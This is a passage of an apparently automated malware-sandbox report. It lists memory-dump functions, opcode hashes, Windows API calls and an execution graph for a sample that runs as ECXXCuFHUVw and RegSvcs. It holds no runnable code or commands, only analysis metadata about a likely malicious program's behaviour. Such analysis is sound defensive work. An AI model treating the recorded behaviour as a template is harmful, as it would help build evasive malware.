                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_77f0000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: 4d9781ba86cc8f4031e29b284d9923da8dfbd4c9970a0aa42dcc16ffa2dd2f27
                                                            • Instruction ID: 92bb6e919fed8c266086958d206f574786325cc0af83facebc9085ff01884ce0
                                                            • Opcode Fuzzy Hash: 4d9781ba86cc8f4031e29b284d9923da8dfbd4c9970a0aa42dcc16ffa2dd2f27
                                                            • Instruction Fuzzy Hash: 5B1146B1800348DFCB20DFAAC984BDEBBF4EB48310F108459D614A7700C374A544CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 077F8DF8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2159490760.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_77f0000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 2c779bb3acd9cfe7fbf79dc9e1ba88f2293944d16e66eb581ffbb6117dc27b3f
                                                            • Instruction ID: 10f9dd848f56d19325c9b855f16d129d1cc9909a54cd84e2016c7e245b54b284
                                                            • Opcode Fuzzy Hash: 2c779bb3acd9cfe7fbf79dc9e1ba88f2293944d16e66eb581ffbb6117dc27b3f
                                                            • Instruction Fuzzy Hash: C9113AB19003498FDB10DFAAC44579FFBF5AF88710F148829D519A7340C779A944CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 077FB420 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 077FD23D
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2159490760.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_77f0000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: 0bdd1287cd3dd16f7c73d7e11d6da5ceb827ce43003c48798984e289821d47e9
                                                            • Instruction ID: 899ee707b37e4f50e3bca61b29e96a404c8568693c662892c98f0ce651dbe6de
                                                            • Opcode Fuzzy Hash: 0bdd1287cd3dd16f7c73d7e11d6da5ceb827ce43003c48798984e289821d47e9
                                                            • Instruction Fuzzy Hash: B81106B5900749DFDB20DF99D945BDEBBF8EB48750F108419E618A7300C375A944CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0157B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0157B086
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2150140711.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_1570000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 030ff017e311d262ca1b5dbb06282e44bd7149c7a418ce64cb29d1dea61721cd
                                                            • Instruction ID: 4a94d70024afbc02ac024637b82231a0b60f280a4ee2655b599ac64d4c3a7687
                                                            • Opcode Fuzzy Hash: 030ff017e311d262ca1b5dbb06282e44bd7149c7a418ce64cb29d1dea61721cd
                                                            • Instruction Fuzzy Hash: B61110B5C00749CFDB20CF9AD444ADEFBF4AB88610F10842AD529BB210C379A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 077FD1DB Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 077FD23D
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2159490760.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_77f0000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: ea95020feb127ad2ab52ecd9c0f1257346ce1886cd96852744ebc0fe521a71c9
                                                            • Instruction ID: 8bf7f0ac4184a6e8cf21e3f2e66688ed8b108218c482a595eabaf46e199899a1
                                                            • Opcode Fuzzy Hash: ea95020feb127ad2ab52ecd9c0f1257346ce1886cd96852744ebc0fe521a71c9
                                                            • Instruction Fuzzy Hash: A11103B5900309DFDB10CF99D985BDEBBF4EB48310F10841AD618A7700C374A544CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 014CD4C4 Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2149754998.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_14cd000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ee9efae2c6dfdba865a82a4e2bec9d8a4323d56aa0bb3150f744cf5e7fc00798
                                                            • Instruction ID: 3b8dfaa686b2da5f621e9874b8810f5a01146ce08983c0730251cecf3ebe2bf1
                                                            • Opcode Fuzzy Hash: ee9efae2c6dfdba865a82a4e2bec9d8a4323d56aa0bb3150f744cf5e7fc00798
                                                            • Instruction Fuzzy Hash: 2921F47A900240EFDB45DF54D9C0B27BF65FB98718F20857ED9090B266C336D456CAE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 014CD3D8 Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2149754998.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_14cd000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a93d39b32aebbfa4b88217c09113cb0b96fe27a9a7051bea5182b8ea270b8f25
                                                            • Instruction ID: 17d8d59b5d7ff0d1b37af54cd16666b1d6220b82fcc7eac63588c0139b12abb8
                                                            • Opcode Fuzzy Hash: a93d39b32aebbfa4b88217c09113cb0b96fe27a9a7051bea5182b8ea270b8f25
                                                            • Instruction Fuzzy Hash: F321F479900204EFDB45DF54D9C0B66FB65FB84714F20C17EDA090B266C336E456CAE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 014DD01C Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2149819605.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_14dd000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6513141a202477687269c47468ca70b72a45640f4038187749a7f35d7f1fded8
                                                            • Instruction ID: b17e9f54ad66e78e437ab619f1fa3641c110e8669036acc7ef8262b4e6c27851
                                                            • Opcode Fuzzy Hash: 6513141a202477687269c47468ca70b72a45640f4038187749a7f35d7f1fded8
                                                            • Instruction Fuzzy Hash: 4621D3B1A04204EFDF16DF68D990B16BB65EBC4318F24C56ED90A4B3A6C336D447CA61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 014DD1D4 Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2149819605.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_14dd000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ea4d09247845a828bb6138c923a020a1666d1caf68ba6ed631605dbae8a720d5
                                                            • Instruction ID: 6d3836f2d029e8e3d606ff92f1e1d605b392405ecd6a5802b0f1b6b06632ae54
                                                            • Opcode Fuzzy Hash: ea4d09247845a828bb6138c923a020a1666d1caf68ba6ed631605dbae8a720d5
                                                            • Instruction Fuzzy Hash: FD21D771A04204EFDF05DFA4D9D0B26BB65FB84324F24C56ED9494B3A2C376D446CA61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 014DD005 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2149819605.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_14dd000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 63731168bdb146b3253cbabee474ec0eb3afbe39a4b3b3fdf7bc605e7c4a4697
                                                            • Instruction ID: f199a2d18a555aae420f8a6d00538c2fe49ce27dbc72dd0da7b0ef8bac8ab670
                                                            • Opcode Fuzzy Hash: 63731168bdb146b3253cbabee474ec0eb3afbe39a4b3b3fdf7bc605e7c4a4697
                                                            • Instruction Fuzzy Hash: D32183B55083849FCB03CF64D994712BF71EB86214F28C5DBD8498F2A7C33A9806CB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 014CD3D3 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2149754998.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_14cd000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                            • Instruction ID: 9555349ccdae65063425557f5234c337fe17f938ec5f0af734befc0be5b55f8f
                                                            • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                            • Instruction Fuzzy Hash: 0711CD76904240DFCB02CF44D9C0B56FF61FB84224F2482BED9090A267C33AE45ACBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 014CD4BF Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2149754998.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_14cd000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                            • Instruction ID: a8c752d908b302c027e8db86c4956d4a3f311c031404617a5e3a24282590ea9f
                                                            • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                            • Instruction Fuzzy Hash: 9811CD76904280DFCB02CF54D9C0B16BF61FB94614F2486AAD8090B266C33AD45ACBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 014DD1CF Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2149819605.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_14dd000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                            • Instruction ID: cdee98fcdd36c9c87cfa7068ead0f0912ae7b3fe89138394adde93a2d65fd9ea
                                                            • Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                            • Instruction Fuzzy Hash: B611BB75904280DFCB02CF54C5D0B16FFB1FB84224F24C6AAD8494B7A6C33AD40ACB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 014CD745 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2149754998.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_14cd000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e41275137317b5737d9d5896c51d7e3d90d4ca085913cd987a0b7528f2690759
                                                            • Instruction ID: 2b5b13a8ae64dc96696ce2ddf763a0c5860a44ec7e75c3ae0d3022164dc2270a
                                                            • Opcode Fuzzy Hash: e41275137317b5737d9d5896c51d7e3d90d4ca085913cd987a0b7528f2690759
                                                            • Instruction Fuzzy Hash: 4C01F779406380EAE7505F69CD84B67FF98EF41A20F04853FEE090A296C6799445C6F1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 014CD744 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2149754998.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_14cd000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c58da0baa12c8d63982fa5492a1e86b2dd7c2acf59f8f5e50fc0ebf78aedd3cf
                                                            • Instruction ID: d82c76821ad07402bd13fbbcf3559b675a861ebbe255d84279fb59546245a79a
                                                            • Opcode Fuzzy Hash: c58da0baa12c8d63982fa5492a1e86b2dd7c2acf59f8f5e50fc0ebf78aedd3cf
                                                            • Instruction Fuzzy Hash: 43F06275405384AAE7518E19CC84B67FF98EB85A34F18C46AED084E696C3799844CBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:10.4%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:148
                                                            Total number of Limit Nodes:14
                                                            execution_graph 41995 6ae3458 DuplicateHandle 41996 6ae34ee 41995->41996 41997 163099b 41998 1630989 41997->41998 42000 163084e 41997->42000 41999 163091b 42000->41999 42004 6ae20f8 42000->42004 42008 6ae2108 42000->42008 42012 1631380 42000->42012 42005 6ae2117 42004->42005 42016 6ae188c 42005->42016 42009 6ae2117 42008->42009 42010 6ae188c 2 API calls 42009->42010 42011 6ae2138 42010->42011 42011->42000 42014 1631396 42012->42014 42013 1631490 42013->42000 42014->42013 42073 1638250 42014->42073 42017 6ae1897 42016->42017 42020 6ae2fec 42017->42020 42019 6ae3abe 42019->42019 42021 6ae2ff7 42020->42021 42022 6ae41e4 42021->42022 42024 6ae5e68 42021->42024 42022->42019 42025 6ae5e89 42024->42025 42026 6ae5ead 42025->42026 42028 6ae6018 42025->42028 42026->42022 42031 6ae6025 42028->42031 42029 6ae605e 42029->42026 42031->42029 42032 6ae3fb4 42031->42032 42033 6ae3fbf 42032->42033 42035 6ae60d0 42033->42035 42036 6ae51ec 42033->42036 42035->42035 42037 6ae51f7 42036->42037 42043 6ae51fc 42037->42043 42039 6ae613f 42047 6aeb450 42039->42047 42053 6aeb438 42039->42053 42040 6ae6179 42040->42035 42046 6ae5207 42043->42046 42044 6ae73c8 42044->42039 42045 6ae5e68 2 API calls 42045->42044 42046->42044 42046->42045 42049 6aeb4cd 42047->42049 42050 6aeb481 42047->42050 42048 6aeb48d 42048->42040 42049->42040 42050->42048 42058 6aeb6b8 42050->42058 42062 6aeb6c8 42050->42062 42055 6aeb450 42053->42055 42054 6aeb48d 42054->42040 42055->42054 42056 6aeb6b8 2 API calls 42055->42056 42057 6aeb6c8 2 API calls 42055->42057 42056->42054 42057->42054 42059 6aeb6c8 42058->42059 42065 6aeb708 42059->42065 42060 6aeb6d2 42060->42049 42064 6aeb708 2 API calls 42062->42064 42063 6aeb6d2 42063->42049 42064->42063 42066 6aeb70d 42065->42066 42067 6aeb74c 42066->42067 42071 6aeb9a2 LoadLibraryExW 42066->42071 42072 6aeb9b0 LoadLibraryExW 42066->42072 42067->42060 42068 6aeb744 42068->42067 42069 6aeb950 GetModuleHandleW 42068->42069 42070 6aeb97d 42069->42070 42070->42060 42071->42068 42072->42068 42074 163825a 42073->42074 42075 1638274 42074->42075 42078 6b0fad7 42074->42078 42082 6b0fae8 42074->42082 42075->42014 42080 6b0fafd 42078->42080 42079 6b0fd12 42079->42075 42080->42079 42081 6b0fd29 GlobalMemoryStatusEx GlobalMemoryStatusEx 42080->42081 42081->42080 42084 6b0fafd 42082->42084 42083 6b0fd12 42083->42075 42084->42083 42085 6b0fd29 GlobalMemoryStatusEx GlobalMemoryStatusEx 42084->42085 42085->42084 41933 15ad030 41934 15ad048 41933->41934 41935 15ad0a2 41934->41935 41940 6aea86c 41934->41940 41946 6aeda97 41934->41946 41950 6aeebf8 41934->41950 41956 6aedaa8 41934->41956 41941 6aea877 41940->41941 41942 6aeec67 41941->41942 41960 6aeee5c 41941->41960 41966 6aeed90 41941->41966 41971 6aeed80 41941->41971 41947 6aedaa8 41946->41947 41948 6aea86c 2 API calls 41947->41948 41949 6aedaef 41948->41949 41949->41935 41951 6aeec08 41950->41951 41952 6aeec67 41951->41952 41953 6aeee5c 2 API calls 41951->41953 41954 6aeed80 2 API calls 41951->41954 41955 6aeed90 2 API calls 41951->41955 41953->41952 41954->41952 41955->41952 41957 6aedace 41956->41957 41958 6aea86c 2 API calls 41957->41958 41959 6aedaef 41958->41959 41959->41935 41961 6aeee1a 41960->41961 41962 6aeee6a 41960->41962 41976 6aeee38 41961->41976 41980 6aeee48 41961->41980 41963 6aeee30 41963->41942 41968 6aeeda4 41966->41968 41967 6aeee30 41967->41942 41969 6aeee38 2 API calls 41968->41969 41970 6aeee48 2 API calls 41968->41970 41969->41967 41970->41967 41973 6aeed90 41971->41973 41972 6aeee30 41972->41942 41974 6aeee38 2 API calls 41973->41974 41975 6aeee48 2 API calls 41973->41975 41974->41972 41975->41972 41977 6aeee48 41976->41977 41978 6aeee59 41977->41978 41983 163fd40 41977->41983 41978->41963 41981 6aeee59 41980->41981 41982 163fd40 2 API calls 41980->41982 41981->41963 41982->41981 41987 163fd62 41983->41987 41991 163fd70 41983->41991 41984 163fd5a 41984->41978 41988 163fd70 41987->41988 41989 163fe0a CallWindowProcW 41988->41989 41990 163fdb9 41988->41990 41989->41990 41990->41984 41992 163fdb2 41991->41992 41994 163fdb9 41991->41994 41993 163fe0a CallWindowProcW 41992->41993 41992->41994 41993->41994 41994->41984 42086 6f22148 42087 6f22450 42086->42087 42088 6f22170 42086->42088 42089 6f22179 42088->42089 42092 6f21614 42088->42092 42091 6f2219c 42094 6f2161f 42092->42094 42093 6f22493 42093->42091 42094->42093 42096 6f21630 42094->42096 42097 6f224c8 OleInitialize 42096->42097 42098 6f2252c 42097->42098 42098->42093 42099 1638078 42100 16380be DeleteFileW 42099->42100 42102 16380f7 42100->42102 42103 6aed8f0 42104 6aed958 CreateWindowExW 42103->42104 42106 6aeda14 42104->42106 42107 6ae3210 42108 6ae3256 GetCurrentProcess 42107->42108 42110 6ae32a8 GetCurrentThread 42108->42110 42111 6ae32a1 42108->42111 42112 6ae32de 42110->42112 42113 6ae32e5 GetCurrentProcess 42110->42113 42111->42110 42112->42113 42114 6ae331b 42113->42114 42115 6ae3343 GetCurrentThreadId 42114->42115 42116 6ae3374 42115->42116

                                                            Executed Functions

                                                            Function 06B05658 Relevance: 1.8, Strings: 1, Instructions: 595COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 571 6b05658-6b05675 572 6b05677-6b0567a 571->572 573 6b0567c-6b05682 572->573 574 6b0568d-6b05690 572->574 575 6b05741-6b0574b 573->575 576 6b05688 573->576 577 6b056a1-6b056a4 574->577 578 6b05692-6b05696 574->578 583 6b05752-6b05754 575->583 576->574 581 6b056b2-6b056b5 577->581 582 6b056a6-6b056ad 577->582 579 6b0569c 578->579 580 6b0581d-6b0582a 578->580 579->577 584 6b056d2-6b056d5 581->584 585 6b056b7-6b056cd 581->585 582->581 588 6b05759-6b0575c 583->588 586 6b056d7-6b056da 584->586 587 6b056df-6b056e2 584->587 585->584 586->587 590 6b056e4-6b056f1 587->590 591 6b056f6-6b056f9 587->591 592 6b05772-6b05775 588->592 593 6b0575e-6b0576d 588->593 590->591 594 6b056fb-6b05701 591->594 595 6b0570c-6b0570f 591->595 592->573 596 6b0577b-6b0577e 592->596 593->592 599 6b057b6-6b057bc 594->599 600 6b05707 594->600 601 6b05711-6b0571a 595->601 602 6b0571b-6b0571e 595->602 603 6b05780-6b05783 596->603 604 6b05788-6b0578b 596->604 605 6b0582b-6b0585b 599->605 606 6b057be-6b057c6 599->606 600->595 602->594 607 6b05720-6b05723 602->607 603->604 608 6b057b1-6b057b4 604->608 609 6b0578d-6b057ac 604->609 623 6b05865-6b05868 605->623 606->605 611 6b057c8-6b057d5 606->611 612 6b05725-6b05737 607->612 613 6b0573c-6b0573f 607->613 608->599 610 6b057e0-6b057e3 608->610 609->608 616 6b057e5-6b057e6 610->616 617 6b057eb-6b057ee 610->617 611->605 615 6b057d7-6b057db 611->615 612->613 613->575 613->588 615->610 616->617 620 6b057f0-6b057f6 617->620 621 6b05801-6b05804 617->621 620->586 624 6b057fc 620->624 625 6b05806-6b05808 621->625 626 6b0580b-6b0580d 621->626 627 6b0588a-6b0588d 623->627 628 6b0586a-6b0586e 623->628 624->621 625->626 629 6b05814-6b05817 626->629 630 6b0580f 626->630 633 6b058a5-6b058a8 627->633 634 6b0588f-6b058a0 627->634 631 6b05952-6b0598c 628->631 632 6b05874-6b0587c 628->632 629->572 629->580 630->629 648 6b0598e-6b05991 631->648 632->631 635 6b05882-6b05885 632->635 636 6b058ca-6b058cd 633->636 637 6b058aa-6b058ae 633->637 634->633 635->627 639 6b058dd-6b058e0 636->639 640 6b058cf-6b058d6 636->640 637->631 638 6b058b4-6b058bc 637->638 638->631 643 6b058c2-6b058c5 638->643 646 6b058e2-6b058e6 639->646 647 6b058fa-6b058fd 639->647 644 6b058d8 640->644 645 6b0594a-6b05951 640->645 643->636 644->639 646->631 649 6b058e8-6b058f0 646->649 650 6b05917-6b0591a 647->650 651 6b058ff-6b05903 647->651 652 6b05993-6b059a4 648->652 653 6b059af-6b059b2 648->653 649->631 656 6b058f2-6b058f5 649->656 658 6b05924-6b05927 650->658 659 6b0591c-6b05923 650->659 651->631 657 6b05905-6b0590d 651->657 671 6b059aa 652->671 672 6b05a2b-6b05a32 652->672 654 6b059b4-6b059c5 653->654 655 6b059cc-6b059cf 653->655 654->672 674 6b059c7 654->674 662 6b059d1-6b059e4 655->662 663 6b059e7-6b059ea 655->663 656->647 657->631 664 6b0590f-6b05912 657->664 660 6b05938-6b0593a 658->660 661 6b05929-6b05933 658->661 667 6b05941-6b05944 660->667 668 6b0593c 660->668 661->660 669 6b059f4-6b059f7 663->669 670 6b059ec-6b059f1 663->670 664->650 667->623 667->645 668->667 677 6b05a05-6b05a08 669->677 678 6b059f9-6b05a00 669->678 670->669 671->653 675 6b05a37-6b05a3a 672->675 674->655 679 6b05a40-6b05bd4 675->679 680 6b05d23-6b05d26 675->680 681 6b05a26-6b05a29 677->681 682 6b05a0a-6b05a1b 677->682 678->677 720 6b05bda-6b05be1 679->720 721 6b05d0d-6b05d20 679->721 683 6b05d44-6b05d47 680->683 684 6b05d28-6b05d39 680->684 681->672 681->675 682->652 689 6b05a21 682->689 685 6b05d65-6b05d68 683->685 686 6b05d49-6b05d5a 683->686 684->672 692 6b05d3f 684->692 685->679 691 6b05d6e-6b05d71 685->691 686->662 696 6b05d60 686->696 689->681 691->679 695 6b05d77-6b05d79 691->695 692->683 697 6b05d80-6b05d83 695->697 698 6b05d7b 695->698 696->685 697->648 700 6b05d89-6b05d92 697->700 698->697 722 6b05c95-6b05c9c 720->722 723 6b05be7-6b05c0a 720->723 722->721 724 6b05c9e-6b05cd1 722->724 732 6b05c12-6b05c1a 723->732 736 6b05cd3 724->736 737 6b05cd6-6b05d03 724->737 734 6b05c1c 732->734 735 6b05c1f-6b05c60 732->735 734->735 745 6b05c62-6b05c73 735->745 746 6b05c78-6b05c89 735->746 736->737 737->700 745->700 746->700
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $
                                                            • API String ID: 0-3993045852
                                                            • Opcode ID: 8e2792c2ded74d46d8ffd4eae3a93d9428f60d2dddcdc2a0c2feffd41bfd5a68
                                                            • Instruction ID: 776da891bb3aa0bdc7de88ed01f3c4213c7047c6d376b63b0e6aecbeb5ce0674
                                                            • Opcode Fuzzy Hash: 8e2792c2ded74d46d8ffd4eae3a93d9428f60d2dddcdc2a0c2feffd41bfd5a68
                                                            • Instruction Fuzzy Hash: 0722B2B6E002158FEF60DBA4C5946AEBFB2FF85310F2084A9D546AB785DA31DC41CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B066B0 Relevance: .8, Instructions: 819COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6a40df928ef68a68c9cc447f3bf0318f089097ae3bdd131837daa389cca960ad
                                                            • Instruction ID: 2bee5809f34ea0a05a5acd80308daae0c9b375c65a250d1de4736e9daf495e48
                                                            • Opcode Fuzzy Hash: 6a40df928ef68a68c9cc447f3bf0318f089097ae3bdd131837daa389cca960ad
                                                            • Instruction Fuzzy Hash: 3E627C70B102159FEB54DB68D594BADBBF2FF88314F2484A9D4069B390EB35ED42CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0C238 Relevance: .6, Instructions: 643COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c5bd427d699f4d7f53e6c89f96c63ecdb4bd32e68c6c9c0755331eabbfd8a2b
                                                            • Instruction ID: c6e05dd0978ebe80c23c3922e44d657b3ced5b55b863c6f541d1fea69861532a
                                                            • Opcode Fuzzy Hash: 9c5bd427d699f4d7f53e6c89f96c63ecdb4bd32e68c6c9c0755331eabbfd8a2b
                                                            • Instruction Fuzzy Hash: CA32A274B102099FEB54DB68E990BADBFB2FB89310F109669E505E7391DB34EC41CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0B2DF Relevance: .6, Instructions: 569COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 74ed5ae57a28970c600d58686055f2975972d40ba22565b08f1157df8fd56869
                                                            • Instruction ID: 92197c363eb51f2a8953d85c8908294ea6aa8ae01b478113e08d74ca10a1a0c9
                                                            • Opcode Fuzzy Hash: 74ed5ae57a28970c600d58686055f2975972d40ba22565b08f1157df8fd56869
                                                            • Instruction Fuzzy Hash: 82226174E102099FEFA4CB68D4907ADBFB6FB89310F2494A5E405DB391DA36DC81CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

